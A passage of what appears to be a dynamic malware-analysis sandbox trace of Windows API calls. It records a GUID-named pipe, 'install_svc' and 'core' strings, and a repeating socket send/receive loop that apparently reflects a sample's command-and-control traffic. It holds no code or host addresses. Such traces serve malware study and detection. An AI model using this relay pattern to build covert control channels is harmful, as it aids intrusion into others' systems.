pguid=0x516fd10*(Data1=0x809be9fc, Data2=0x4888, Data3=0x4de2, Data4=([0]=0xb0, [1]=0x82, [2]=0x6b, [3]=0xb2, [4]=0x5f, [5]=0x3a, [6]=0x1f, [7]=0xee))) returned 0x0 [0078.892] _snprintf (in: _Dest=0x516fc60, _Count=0x78, _Format="%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" | out: _Dest="809be9fc-4888-4de2-b082-6bb25f3a1fee") returned 36 [0078.892] strlen (_Str="809be9fc-4888-4de2-b082-6bb25f3a1fee") returned 0x24 [0078.892] strlen (_Str="809be9fc-4888-4de2-b082-6bb25f3a1fee") returned 0x24 [0078.892] strlen (_Str="809be9fc-4888-4de2-b082-6bb25f3a1fee") returned 0x24 [0078.892] CreateNamedPipeA (lpName="\\\\.\\pipe\\809be9fc-4888-4de2-b082-6bb25f3a1fee" (normalized: "\\device\\namedpipe\\809be9fc-4888-4de2-b082-6bb25f3a1fee"), dwOpenMode=0x40080003, dwPipeMode=0x0, nMaxInstances=0x1, nOutBufferSize=0x0, nInBufferSize=0x0, nDefaultTimeOut=0x1388, lpSecurityAttributes=0x0) returned 0x270 [0078.892] CreateIoCompletionPort (FileHandle=0x270, ExistingCompletionPort=0x1e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x1) returned 0x1e0 [0078.892] ConnectNamedPipe (in: hNamedPipe=0x270, lpOverlapped=0x262c0a8 | out: lpOverlapped=0x262c0a8) returned 0 [0078.892] GetLastError () returned 0x3e5 [0078.892] strlen (_Str="\\\\.\\pipe\\") returned 0x9 [0078.892] strlen (_Str="install_svc") returned 0xb [0078.892] strlen (_Str="install_svc") returned 0xb [0078.892] strlen (_Str="install_svc") returned 0xb [0078.892] GetCurrentProcess () returned 0xffffffff [0078.892] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x1) returned 0x278 [0078.892] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4de9850, lpParameter=0x262b0b8, dwCreationFlags=0x0, lpThreadId=0x262b0e4 | out: lpThreadId=0x262b0e4*=0x5b0) returned 0x274 [0078.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x244 [0078.893] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x24c [0078.893] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4dd58fc, lpParameter=0x2626978, dwCreationFlags=0x0, lpThreadId=0x2626980 | out: lpThreadId=0x2626980*=0x834) returned 0x2b8 [0078.893] strlen (_Str="") returned 0x0 [0078.893] strlen (_Str="") returned 0x0 [0078.893] CreateIoCompletionPort (FileHandle=0x268, ExistingCompletionPort=0x278, CompletionKey=0x0, NumberOfConcurrentThreads=0x1) returned 0x278 [0078.893] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x26396d0) returned 1 [0078.893] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x262137c) returned 1 [0078.893] WaitForSingleObject (hHandle=0x260, dwMilliseconds=0x7530) returned 0x0 [0078.894] CloseHandle (hObject=0x260) returned 1 [0078.894] GetCurrentThreadId () returned 0xac0 [0078.894] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0078.894] GetLastError () returned 0x3e5 [0078.894] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.894] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.894] GetCurrentThreadId () returned 0xac0 [0078.894] ReadFile (in: hFile=0x270, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 1 [0078.895] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.895] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.896] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.907] strlen (_Str="install_svc") returned 0xb [0078.907] strlen (_Str="1B2218C5626A39BEFB72890774B1FE190202C074") returned 0x28 [0078.907] WSASend (in: s=0x214, lpBuffers=0x516fdd0*=((len=0x89, buf=0x2650f50*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fdd0*=((len=0x89, buf=0x2650f50*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0078.907] strlen (_Str="core") returned 0x4 [0078.907] strlen (_Str="core") returned 0x4 [0078.908] strlen (_Str="core") returned 0x4 [0078.908] GetCurrentThreadId () returned 0xac0 [0078.908] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.908] WSASend (in: s=0x214, lpBuffers=0x516fec8*=((len=0x2b, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fec8*=((len=0x2b, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0078.908] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.908] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0078.908] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.159] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0079.159] GetLastError () returned 0x3e5 [0079.159] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.159] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.161] strlen (_Str="core") returned 0x4 [0079.161] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0079.161] strlen (_Str="install_svc") returned 0xb [0079.161] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x38, buf=0x262bfb8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x38, buf=0x262bfb8*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0079.162] GetCurrentThreadId () returned 0xac0 [0079.162] ReadFile (in: hFile=0x270, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 0 [0079.162] GetLastError () returned 0x3e5 [0079.162] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.162] strlen (_Str="install_svc") returned 0xb [0079.162] strlen (_Str="core") returned 0x4 [0079.162] strlen (_Str="install_svc") returned 0xb [0079.162] strlen (_Str="install_svc") returned 0xb [0079.162] GetCurrentThreadId () returned 0xac0 [0079.162] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.162] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.393] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0079.393] GetLastError () returned 0x3e5 [0079.393] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.393] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.395] strlen (_Str="core") returned 0x4 [0079.395] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0079.395] strlen (_Str="install_svc") returned 0xb [0079.395] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0079.396] GetCurrentThreadId () returned 0xac0 [0079.396] ReadFile (in: hFile=0x270, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 0 [0079.396] GetLastError () returned 0x3e5 [0079.396] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.396] strlen (_Str="install_svc") returned 0xb [0079.396] strlen (_Str="core") returned 0x4 [0079.396] strlen (_Str="install_svc") returned 0xb [0079.396] strlen (_Str="install_svc") returned 0xb [0079.396] GetCurrentThreadId () returned 0xac0 [0079.396] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.396] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.628] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0079.628] GetLastError () returned 0x3e5 [0079.628] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.628] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.630] strlen (_Str="core") returned 0x4 [0079.630] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0079.630] strlen (_Str="install_svc") returned 0xb [0079.630] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0079.630] GetCurrentThreadId () returned 0xac0 [0079.630] ReadFile (in: hFile=0x270, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 0 [0079.630] GetLastError () returned 0x3e5 [0079.630] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.630] strlen (_Str="install_svc") returned 0xb [0079.630] strlen (_Str="core") returned 0x4 [0079.630] strlen (_Str="install_svc") returned 0xb [0079.630] strlen (_Str="install_svc") returned 0xb [0079.630] GetCurrentThreadId () returned 0xac0 [0079.630] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0079.631] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.030] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0080.030] GetLastError () returned 0x3e5 [0080.030] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.030] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.031] strlen (_Str="core") returned 0x4 [0080.031] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0080.031] strlen (_Str="install_svc") returned 0xb [0080.031] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0080.032] GetCurrentThreadId () returned 0xac0 [0080.032] ReadFile (in: hFile=0x270, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 0 [0080.032] GetLastError () returned 0x3e5 [0080.032] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.032] strlen (_Str="install_svc") returned 0xb [0080.032] strlen (_Str="core") returned 0x4 [0080.032] strlen (_Str="install_svc") returned 0xb [0080.032] strlen (_Str="install_svc") returned 0xb [0080.032] GetCurrentThreadId () returned 0xac0 [0080.032] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.032] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.266] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0080.266] GetLastError () returned 0x3e5 [0080.266] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.267] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.268] strlen (_Str="core") returned 0x4 [0080.268] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0080.268] strlen (_Str="install_svc") returned 0xb [0080.268] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0080.269] GetCurrentThreadId () returned 0xac0 [0080.269] ReadFile (in: hFile=0x270, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 0 [0080.269] GetLastError () returned 0x3e5 [0080.269] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.269] strlen (_Str="install_svc") returned 0xb [0080.269] strlen (_Str="core") returned 0x4 [0080.269] strlen (_Str="install_svc") returned 0xb [0080.269] strlen (_Str="install_svc") returned 0xb [0080.269] GetCurrentThreadId () returned 0xac0 [0080.269] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.269] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.500] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0080.500] GetLastError () returned 0x3e5 [0080.500] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.501] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.502] strlen (_Str="core") returned 0x4 [0080.502] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0080.502] strlen (_Str="install_svc") returned 0xb [0080.502] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0080.502] GetCurrentThreadId () returned 0xac0 [0080.502] ReadFile (in: hFile=0x270, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8 | out: lpBuffer=0x262c12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x262c0c8) returned 0 [0080.502] GetLastError () returned 0x3e5 [0080.502] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.503] strlen (_Str="install_svc") returned 0xb [0080.503] strlen (_Str="core") returned 0x4 [0080.503] strlen (_Str="install_svc") returned 0xb [0080.503] strlen (_Str="install_svc") returned 0xb [0080.503] GetCurrentThreadId () returned 0xac0 [0080.503] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.503] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.734] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0080.734] GetLastError () returned 0x3e5 [0080.734] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.735] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0080.737] strlen (_Str="core") returned 0x4 [0080.737] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0080.737] strlen (_Str="install_svc") returned 0xb [0080.737] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0080.737] GetCurrentThreadId () returned 0xac0 [0080.737] ReadFile (in: hFile=0x270, lpBuffer=0x262c12c, nNumberOfBytesToRead=0x1000, 